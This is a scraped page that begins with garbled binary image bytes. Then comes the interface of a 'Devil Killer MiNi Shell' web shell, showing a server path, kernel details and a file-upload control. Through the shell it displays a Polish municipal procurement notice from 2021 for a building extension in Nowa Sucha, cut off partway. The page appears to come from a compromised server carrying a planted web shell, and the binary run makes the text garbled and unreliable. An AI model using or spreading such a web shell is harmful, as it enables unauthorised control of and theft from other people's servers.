JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210714/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210714/0011385601-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00113856 z dnia 2021-07-14</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> ROZBUDOWA ZAPLECZA BUDYNKU GMINNEGO PRZY BOISKU SPORTOWYM W NOWEJ SUCHEJ </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Nowa Sucha</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 750148377</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Nowa Sucha</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Nowa Sucha</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">96-513</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL926 - Żyrardowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">46 861-20-51</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">46 861-20-51 w. 18</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gmina@nowasucha.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">nowasucha.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> ROZBUDOWA ZAPLECZA BUDYNKU GMINNEGO PRZY BOISKU SPORTOWYM W NOWEJ SUCHEJ </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-36ca3ec9-e481-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00113856</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-14</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00041068/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Rozbudowa zaplecza budynku gminnego przy boisku sportowym w Nowej Suchej</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Komunikacja w postępowaniu o<br/>udzielenie zamówienia, w tym składanie ofert, wniosków o dopuszczenie do udziału w postępowaniu,<br/>wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między zamawiającym a<br/>wykonawcą, z uwzględnieniem wyjątków określonych w ustawie Pzp.2. W postepowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu miniPortalu,<br/>który dostępny jest pod adresem: https://miniportal.uzp.gov.pl/, ePUAPu, dostępnego pod adresem:<br/>https://epuap.gov.pl/wps/portal oraz poczty elektronicznej pod adresem: gmina@nowasucha.pl . 3.<br/>Osobą uprawnioną do porozumiewania się z Wykonawcami jest:Wojciech Kraszewski, tel. 46 861-20-<br/>51 wew. 29; e-mail: wojciech.kraszewski@</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.<br/>Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi<br/>posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do następujących<br/>formularzy: ,,Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz do ,,Formularza do<br/>komunikacji”. 2. Ofertę, oświadczenia, o których mowa w art. 125 ust. 1 Pzp, podmiotowe środki<br/>dowodowe, pełnomocnictwa, zobowiązanie podmiotu udostępniającego zasoby sporządza się w<br/>postaci elektronicznej, w ogólnie dostępnych formatach danych, w szczególności w formatach .txt, .rtf,<br/>.pdf, .doc, .docx, .odt . Ofertę, a także oświadczenie o jakim mowa w Rozdziale XII ust. 1 SWZ składa<br/>się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej<br/>podpisem zaufanym lub podpisem osobistym.3. Wymagania techniczne i organizacyjne wysyłania i<br/>odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz<br/>informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu<br/>miniPortal oraz Warunkach korzystania z elektronicznej platformy usług administracji publicznej<br/>(ePUAP).4. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy:<br/>„Formularz złożenia, zmiany, wycofania oferty lub wniosku” i „Formularza do komunikacji” wynosi 150<br/>MB.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1 z późn. zm.), dalej „RODO”, informuję, że: 1) administratorem Pani/Pana danych<br/>osobowych jest Urząd Gminy Nowa Sucha, Nowa Sucha 59A, 96-513 Nowa Sucha;2) inspektorem<br/>ochrony danych osobowych w Urzędzie Gminy Nowa Sucha jest Pan Robert Żuchowski, kontakt:<br/>iodo@spotcase.pl *;3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c<br/>RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego pn. Rozbudowa zaplecza budynku gminnego przy boisku sportowym w Nowej Suchej, nr sprawy ZP:271.8.1.2021 prowadzonym w trybie podstawowym;4) dostęp do<br/>danych mogą mieć podmioty uprawnione na podstawie przepisów prawa; odbiorcami Pani/Pana<br/>danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja<br/>postępowania w oparciu o art. 18 oraz art. 74 ust. 1 i 2 ustawy Pzp; udostępnienie, o którym mowa w<br/>art. 74 ust. 1 i 2 ustawy Pzp, ma zastosowanie do wszystkich danych osobowych, z wyjątkiem danych,<br/>o których mowa w art. 9 ust. 1 RODO, zebranych w toku postępowania o udzielenie zamówienia; 5)<br/>odrębną kategorię odbiorców, którym mogą być ujawnione Państwa dane są podmioty uprawnione do<br/>obsługi doręczeń oraz podmioty zewnętrzne świadczące usługi na rzecz urzędu w zakresie<br/>niezbędnym do ich realizacji (np. serwis systemów informatycznych);6) Zebrane dane będą<br/>przetwarzane do momentu wygaśnięcia podstawy prawnej przetwarzania z wyłączeniem celów<br/>statystycznych, archiwalnych i zabezpieczenia przyszłych roszczeń administratora danych. Pani/Pana<br/>dane osobowe będą przechowywane w szczególności przez okres niezbędny do realizacji celów<br/>przetwarzania, co najmniej przez okres 5 lat od dnia zakończenia postępowania o udzielenie<br/>zamówienia, a jeżeli czas trwania umowy przekracza 5 lat, okres przechowywania obejmuje cały czas<br/>trwania umowy, nie krócej niż okres wskazany w przepisach o archiwizacji tj. ustawie z dnia 14 lipca<br/>1983 r. o narodowym zasobie archiwalnym i archiwach;7) obowiązek podania przez Panią/Pana<br/>danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w<br/>przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego;<br/>konsekwencje niepodania określonych danych wynikają z ustawy Pzp; 8) w odniesieniu do Pani/Pana<br/>danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22<br/>RODO;9) Zamawiający przetwarza dane osobowe zebrane w postępowaniu o udzielenie zamówienia w<br/>sposób gwarantujący zabezpieczenie przed ich bezprawnym rozpowszechnianiem;10) Jednocześnie<br/>Zamawiający przypomina o ciążącym na Pani/Panu obowiązku informacyjnym wynikającym z art. 13 i<br/>14 RODO względem osób fizycznych, których dane przekazane zostaną Zamawiającemu w związku z<br/>prowadzonym postępowaniem i które Zamawiający pośrednio pozyska od wykonawcy biorącego udział<br/>w postępowaniu, chyba że ma zastosowanie co najmniej jedno z wyłączeń, o których mowa w art. 14<br/>ust. 5 RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP:271.8.1.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest rozbudowa zaplecza budynku gminnego przy boisku sportowym w Nowej Suchej.<br/>Projektowana inwestycja będzie polegała na dobudowie części wydzielonej w pionie od części istniejącej (od fundamentów do przykrycia dachu) ścianą wydzielenia przeciwpożarowego.<br/>Pow. zabudowy projektowanego budynku – 122,04 m2<br/>Powierzchnia użytkowa – 125,6 m2 (parter – 74,85 m2, poddasze – 50,75 m2)<br/>Kubatura 784 m3<br/><br/>Szczegółowy zakres prac podany w projekcie budowlanym i przedmiarze robót. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">39290000-1 - Wyposażenie różne</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</p> <p class="mb-0">45233200-1 - Roboty w zakresie różnych nawierzchni</p> <p class="mb-0">45261100-5 - Wykonywanie konstrukcji dachowych</p> <p class="mb-0">45261210-9 - Wykonywanie pokryć dachowych</p> <p class="mb-0">45262300-4 - Betonowanie</p> <p class="mb-0">45262520-2 - Roboty murowe</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <p class="mb-0">45320000-6 - Roboty izolacyjne</p> <p class="mb-0">45331100-7 - Instalowanie centralnego ogrzewania</p> <p class="mb-0">45331210-1 - Instalowanie wentylacji</p> <p class="mb-0">45332200-5 - Roboty instalacyjne hydrauliczne</p> <p class="mb-0">45332300-6 - Roboty instalacyjne kanalizacyjne</p> <p class="mb-0">45333000-0 - Roboty instalacyjne gazowe</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45420000-7 - Roboty w zakresie zakładania stolarki budowlanej oraz roboty ciesielskie</p> <p class="mb-0">45430000-0 - Pokrywanie podłóg i ścian</p> <p class="mb-0">45442100-8 - Roboty malarskie</p> <p class="mb-0">45443000-4 - Roboty elewacyjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-05-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Roboty budowlane związane z rozbudową, przebudową budynku użyteczności publicznej w zakresie zbliżonym do przedmiotu zamówienia na warunkach zgodnych z prowadzonym postępowaniem</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Kryteria oceny ofert: Kryterium I: cena – waga kryterium 60% Kryterium II: okres gwarancji –<br/>waga kryterium 40% 2. Sposób obliczenia punktów:Ocena będzie dokonywana według skali<br/>punktowej, poprzez sumowanie punktów uzyskanych w kryteriach oceny; maksymalnie można<br/>osiągnąć 100 punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1) Zdolności do występowania w obrocie gospodarczym;Zamawiający nie precyzuje tego<br/>warunku 2) Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o<br/>ile wynika to z odrębnych przepisów;Zamawiający nie precyzuje tego warunku 3) Sytuacji<br/>ekonomicznej lub finansowej;Zamawiający uzna warunek za spełniony, jeżeli Wykonawca<br/>wykaże, że:- Posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej<br/>działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego<br/>ubezpieczenia minimum 500 000,00 zł Ocena spełnienia warunku zostanie ocenione na<br/>zasadzie<br/>spełnia/nie spełnia na podstawie oświadczeń i dokumentów określonych w rozdziale XII ust. 72,<br/>pkt 4) lit. a4) Zdolności technicznej lub zawodowej;Zamawiający uzna warunek za spełniony,<br/>jeżeli Wykonawca wykaże, że:- dysponuje lub będzie dysponował osobami, które będą pełniły<br/>funkcję:• Kierownika Budowy, posiadającą odpowiednie uprawnienia budowlane do pełnienia<br/>samodzielnych funkcji technicznych w budownictwie wraz z informacjami na temat ich<br/>kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych dla wykonania<br/>zamówienia oraz informacją o podstawie dysponowania tą osobą.- Wykonał w okresie ostatnich<br/>5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich<br/>rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały<br/>wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały<br/>wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty<br/>sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli<br/>wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne<br/>odpowiednie dokumenty – co najmniej dwie roboty polegające na budowie obiektu kubaturowego w zakresie zbliżonym do niniejszego zamówienia o<br/>wartości co najmniej 850 000,00 zł brutto każdy Ocena spełnienia warunku zostanie ocenione na<br/>zasadzie spełnia/nie spełnia <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Na potwierdzenie braku podstaw do wykluczenia:a) oświadczenia wykonawcy, w zakresie art. 108 ust.<br/>1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16<br/>lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym<br/>wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek do udziału w postępowaniu,<br/>albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub<br/>informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do<br/>udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej,b) zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzające, że<br/>Wykonawca nie zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy,<br/>wystawione nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem<br/>podatków lub opłat wraz z zaświadczeniem zamawiający żąda złożenia dokumentów<br/>potwierdzających, że odpowiednio przed upływem terminu składania wniosków o dopuszczenie do<br/>udziału w postępowaniu albo przed upływem terminu składania ofert wykonawca dokonał płatności<br/>należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w<br/>sprawie spłaty tych należności,c) zaświadczenia albo innego dokumentu właściwej terenowej jednostki<br/>organizacyjnej Zakładu Ubezpieczeń Społecznych lub właściwej placówki terenowej Kasy Rolniczego<br/>Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie zalega z opłacaniem składek na<br/>ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt 1 ustawy, wystawionego nie<br/>wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem składek na<br/>ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym dokumentem zamawiający<br/>żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania<br/>wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert<br/>wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne lub zdrowotne wraz z<br/>odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłaty tych należności,d) odpisu<br/>lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności<br/>Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące<br/>przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Na potwierdzenie warunków udziału w postępowaniu:a) Dokument<br/>potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie<br/>prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej<br/>tego ubezpieczenia minimum 500 000,00 zł – jeżeli w treści polisy nie ma informacji o jej opłaceniu<br/>należy załączyć dokumenty potwierdzające jej opłacenie,b) Wykaz osób, skierowanych przez<br/>wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie<br/>usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich<br/>kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania<br/>zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informację o<br/>podstawie do dysponowania tymi osobami – Kierownik budowy posiadający uprawnienia budowlane do<br/>kierowania robotami budowlanymi wydane w trybie przepisów ustawy z 